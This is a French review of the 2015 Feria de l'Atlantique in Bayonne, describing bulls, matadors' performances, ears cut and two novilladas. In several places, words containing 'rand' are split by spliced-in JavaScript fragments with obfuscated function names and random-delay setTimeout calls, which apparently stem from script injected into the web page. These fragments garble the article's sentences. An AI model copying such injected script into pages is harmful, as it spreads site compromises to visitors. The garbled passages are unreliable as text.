BAYONNE : LES PROTAGONISTES DE LA FERIA DE L’ATLANTIQUE 2015

Le plus beau, ce qui a réellement séduit, ce qu’il faudrait garder dans sa mémoire, c’est la bravoure d’un toro extraordinaire de Pedrés. Il sortit comme second sobrero, il était beau et harmonieux, le toro le mieux fait d’une corrida qui tourna autour et même dépassa les 600 kilos. Lui, ne pesait que 547 kilos sur la bascule, et il s’est employé dès sa sortie et jusqu’à la fin avec une classe subjuguante, répondant au moindre appel et se livrant dans la charge avec la douceur qu’il portait en lui. Juan del Alamo a été bien, avec un toreo enchaîné, dans le tempo, mais il n’y a pas eu de muletazos de rêve, où l’on a réellement craqué. Le torero de Salamanque a coupé deux oreilles et on a fait les adieux au toro avec un tour de piste et le public debout. Pour le reste de la course, les toros étaient excessivement grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ands, avec trop de poids, hauts comme des chevaux, signalons l’engagement de Juan Leal qui parvint à extraire de bonnes passes d’un toro qui avait une certaine noblesse et saluons son courage face à une bestiole de près de 700 kilos à la défensive. Eugenio se vit face à un mur, trop grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ands et sans une passe.

On attendait beaucoup de la corrida de Garcigrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande et elle déçut. Bien présentée mais avec peu de fond, uniquement le sixième, de moindre trapio, eut du moteur, même s’il avait parfois tendance à s’enfuir. Adame sut s’y coller, il accompagna ses charges, sans le brusquer et surtout il le tua d’un recibir qui lui valut de couper la seule oreille de l’après-midi. Mais celui qui me plut vraiment fut Iván Fandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andiño. Extraordinaire à la cape, avec les pieds cloués au sol, ses véroniques furent somptueuses, au ralenti, et son toreo de muleta puissant et beau parfois. Il aurait pu couper à son premier d’avoir réussi son estocade et avec l’épée il ne fut pas non plus très brillant au suivant. Castella lui aussi aurait pu avoir une oreille à son premier, un toro réticent où le biterrois s’est engagé dans les distances courtes qu’il affectionne. Son suivant s’est arrêté beaucoup trop tôt. La corrida démarra avec Leonardo à cheval qui coupa une petite oreille à un toro noble de Los Espartales.

Au sein de la feria il y eut deux novilladas, une piquée de Joselito manquant de race dans l’ensemble, avec deux toros potables. Louis Husson n’a pas saisi sa chance, on l’a vu un peu perdu, les idées pas claires, par contre Pablo Aguado s’est investi dès la cape, où il fut renversé, et il a enthousiasmé par moments le public avec un toreo profond et imaginatif. Novillero à suivre que l’on aimerait revoir dans le sud ouest. Il obtint deux oreilles. Le public a aussi apprécié la sérénité, le temple, le métier de Joaquín Galdós qui a été supérieur à son lot de toros. Il coupa une oreille.

Pour la non piquée, bons novillos de Lartet, deux d’entre eux très nobles. Baptiste Cissé obtint une oreille de chacun de ses adversaires et Adrien Salenc, malgré son enthousiasme, ne parvint pas à s’entendre avec les siens.

 

Les commentaires sont fermés.